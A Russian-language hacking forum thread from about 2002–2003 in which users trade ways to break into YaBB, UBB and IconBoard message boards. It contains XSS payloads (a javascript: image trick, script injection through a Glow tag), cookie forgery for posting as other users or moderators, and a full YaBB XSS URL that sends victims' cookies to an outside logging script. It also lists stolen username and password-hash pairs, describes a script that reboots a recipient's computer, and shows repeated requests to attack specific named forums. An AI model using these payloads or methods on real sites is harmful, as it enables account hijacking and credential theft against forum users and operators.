КТо знает как взломать YABB форум, буду благодарен

чё никто не знает?

Адрес хоть дай...Первый раз слышу о таком ...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ мая 29 2002,19:39)</td></tr><tr><td id="QUOTE">КТо знает как взломать YABB форум, буду благодарен[/QUOTE]<span id='postcolor'>
Ааа... нашел уже ...
Ломается точно так же как и UBB - через картинки.
Например javascript:alert();d.jpg

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ мая 31 2002,11:45)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ мая 29 2002,19:39)</td></tr><tr><td id="QUOTE">КТо знает как взломать YABB форум, буду благодарен[/QUOTE]<span id='postcolor'>
Ааа... нашел уже ...
Ломается точно так же как и UBB - через картинки.
Например javascript:alert();d.jpg[/QUOTE]<span id='postcolor'>
а вот и не пашет

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ мая 31 2002,18:39)</td></tr><tr><td id="QUOTE">а вот и не пашет[/QUOTE]<span id='postcolor'>
Я смотрел в http://www.tehnovagon.ru/cgi-bin/yabb/YaBB.cgi
Возможно в других форумах дыры прикрывают ....
Как и ты прикрыл здесь ...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ мая 31 2002,18:44)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ мая 31 2002,18:39)</td></tr><tr><td id="QUOTE">а вот и не пашет[/QUOTE]<span id='postcolor'>
Я смотрел в http://www.tehnovagon.ru/cgi-bin/yabb/YaBB.cgi
Возможно в других форумах дыры прикрывают ....
Как и ты прикрыл здесь ...[/QUOTE]<span id='postcolor'>
Может дело в версиях YaBB форума, на техновагоне версия чуть старее

Я не знаю насчет YABB, но UBB форумы ломаются еще и через подделывание ника в кукисах
(я кстати обновил свою статью, там теперь есть кое-что о UBB YABB форумах)

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 03 2002,14:00)</td></tr><tr><td id="QUOTE">Я не знаю насчет YABB, но UBB форумы ломаются еще и через подделывание ника в кукисах
(я кстати обновил свою статью, там теперь есть кое-что о UBB YABB форумах)[/QUOTE]<span id='postcolor'>
А де ета статья http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif?http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (LasThauS @ июня 05 2002,02:12)</td></tr><tr><td id="QUOTE">А де ета статья http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif?http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif[/QUOTE]<span id='postcolor'>
Здесь (http://antichat.ru/crackchat/index1.html)

Kakie vidy forumov sushestvuyut?
YABB, UBB , nikto ne znaet bolshe?

Php
да до фига ты шо?

Можно ли зайти под чужим ником или под видом модера? Выдрать обязанности модера?

Да

Я НЕ ДАВНО ЧЕРЕЗ ПОДМЕНУ COOKIE НАУЧИЛСЯ ПИСАТЬ В ФОРУМЕ ПОД ЧУЖИМ ЗАРЕГИСТРИРОВАННЫМ НИКОМ.

Еще один способ взлома есть. Можно в тэг Glow(а может, возможно и через другие тэги тоже самое сделать, я не проверял) вставить скриптик.
Ляля-ля тополя

2Nikolay, существуют также IconBoard и Vb(не помню, как это расшифровывается.Я с этим типом форумов никогда не встречался)IconBoard, если я не ошибаюсь, перед нами. Это движок вот этого самого форума.
2Sam18, PhP - это не вид форумов, а язык программирования, на котором их пишут. Существуют еще Perl, Cgi и куча других. А видов форумов тоже много, но UBB, YaBB, Ib и Vb самые популярные. По-моему, самые лучшие из них - это YaBB и IconBoard.

2All: поскажите пожалуйста, как зайти под чужим ником или под ником модера(особенно модера!http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif в форуме YaBB.

2Matias, какие скрипты реально взламывают, а не просто выдают мелкие глюки (типа alert)?

2Coolant, давно я этим делом занимался, сейчас не вспомню..У Алгола спроси, он знает, наверное..

Кстати, если кому нужно, могу помочь подобрать пароль админа какого-нибудь форума от Eforum. Туда можете пригласить того человека, чей пароль хотите получить, и если он укажет тот же пароль что использует В-месте-которое-нужно-вам , то вы сможете узнать этот пароль.
2Coolant, можешь через кукисы попробовать.

2Matias, Спасибо, но все же как через кукисы, то бишь нужны кукисы другоо чела иль нет?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Matias @ мая 12 2003,21:15)</td></tr><tr><td id="QUOTE">PhP - это не вид форумов, а язык программирования, на котором их пишут. Существуют еще Perl, Cgi и куча других.[/QUOTE]<span id='postcolor'>
Уточнение: cgi это не язык программирования, это формат передачи данных от веб-сервера к прикладным приложениям, а также специфическая форма вызова этих приложений. В этом формате могут работать и perl и exe и др...

Algol, согласен. Я просто давно не имел дела с форумами, вот немного и подзабыл. Теперь помнить буду. Спасибо. &nbsp;Я в ближайшее время немного изучу Vb, вам инфу о том, как этот вид можно ломануть.
2Coolant, да, вроде, нужны. Кажется, я когда ломал пароль одного знакомого модера, использовал и его кукисы. Ток не надо спрашивать, как я достал, я помню только, что как-то ломал.

2Algol, Выручай, объясни пожалуйста, как в форуме yabb зайти под чужим ником, лучше под модеровским.

Межсайтовый скриптинг в известном форуме YaBB 1 Gold - SP!

http://the.target.xxx/board....39;Http (http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269# 60;script&gt;location%3d'Http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b&lt;/Script&gt;)

num - это не существующий постинг.
board - должен быть существующий и доступный форум
X.php - скрипт для лога куки

Что в примере куки?
268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY

Проверено на YaBB 1 Gold - SP1!

Возможно изменение пароля к форуму.
_
Powered by #termes

а как насчёт forum.podolsk.ru?

cyber-pirat, что ты имеешь ввиду под этой ссылкой?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Что в примере куки?
268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY[/QUOTE]<span id='postcolor'>
А где именно эти логины?

IconBoard вообще-то самый дырявый из всех. на втором месте - YaBB. На третьем- Ubb.Насчет VB ничего не знаю.
Вчера кому-то в приват на одном Ib форуме послал один скрипт, от которого у бедного получателя автоматом дважды нажалось &quot;Ctrl+Alt+Del&quot; http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif &nbsp;
В принципе можно больше раз. Представляете себе такую картину - бесконечноавтоперезагружа ющийся комп=)

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Matias @ мая 19 2003,22:21)</td></tr><tr><td id="QUOTE">IconBoard вообще-то самый дырявый из всех. на втором месте - YaBB. На третьем- Ubb.[/QUOTE]<span id='postcolor'>
Вообще-то не согласен.
Если в IB и YaBB закрыты все дыры с отправкой скриптов (а все нормальные люди их закрывают), то они достаточно надежны.
Зато в UBB есть дыра с подделкой кука, и есть возможность вставки скрипта прямо на лицевую страничку форума http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif) (кстати вот пример forum (http://eforum.com.ua/cgi-bin/ultimatebb.cgi?cdff=0069))
Кроме того, куки содержат незашифрованный пароль, и простенький сниф позволяет легко загрести админские права...

Ой, ну не надо мне на eforum.com.ua ссылку давать. У них там дырочка покрепче есть. Там у всех форумов первоначальный пароль один на всех. А FAQ , ес-но, никто не читает. Почти никто не догадывается сменить пароль.
И еще, в форумах от этой компании, кажется, нелзя изменять файлы вручную. А так, в UBB обычно закрывают все дыры. В этом случае все форумы непроницаемы.
Кстати, ты не знаешь, какие дырки есть в форумах VB?

Ребята, что никто не объяснит &quot;угон&quot; пароля в yabb?

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Matias @ мая 20 2003,20:47)</td></tr><tr><td id="QUOTE">У них там дырочка покрепче есть. Там у всех форумов первоначальный пароль один на всех.[/QUOTE]<span id='postcolor'>
Ну это вообще-то и не дырка ...

А насчет VB - не знаю, не сталкивался, но дыры наверно такие же как у всех остальных ))

http://www.ganjawars.ru/posts/
А кто этот форум взломает??http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

Ребят... вы тут -&quot;я то сломаю, это сломаю&quot;, а слабо сломать такое http://chat.aspol.ru/ слабо, знаю!!!

http://www.gamex.orn.ru/cgi-bin/yabb/YaBB.pl

сломайте его !!!!!!!!!!!!

Хотелось бы пошуметь на форуме (http://www.natm.ru/forum).Но чё то не прошодит. Помогите!!!

Пацаны обьясните пожалуйсто ктонить как форумы ломать ?? как ченибуть там изменить, админом себя сделать и т.д.. помогите пожалуйсто.. http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif

А разве об этом не писали предыдущие страницы темы?..

Ребят, есть форум www.cosmo.ru/forum.php где модераторы бабы-стервы, и вообще нас призерают и унижаюьт.... dplh.xbv-rf b[))))

А слабо сломать virk.ru/forums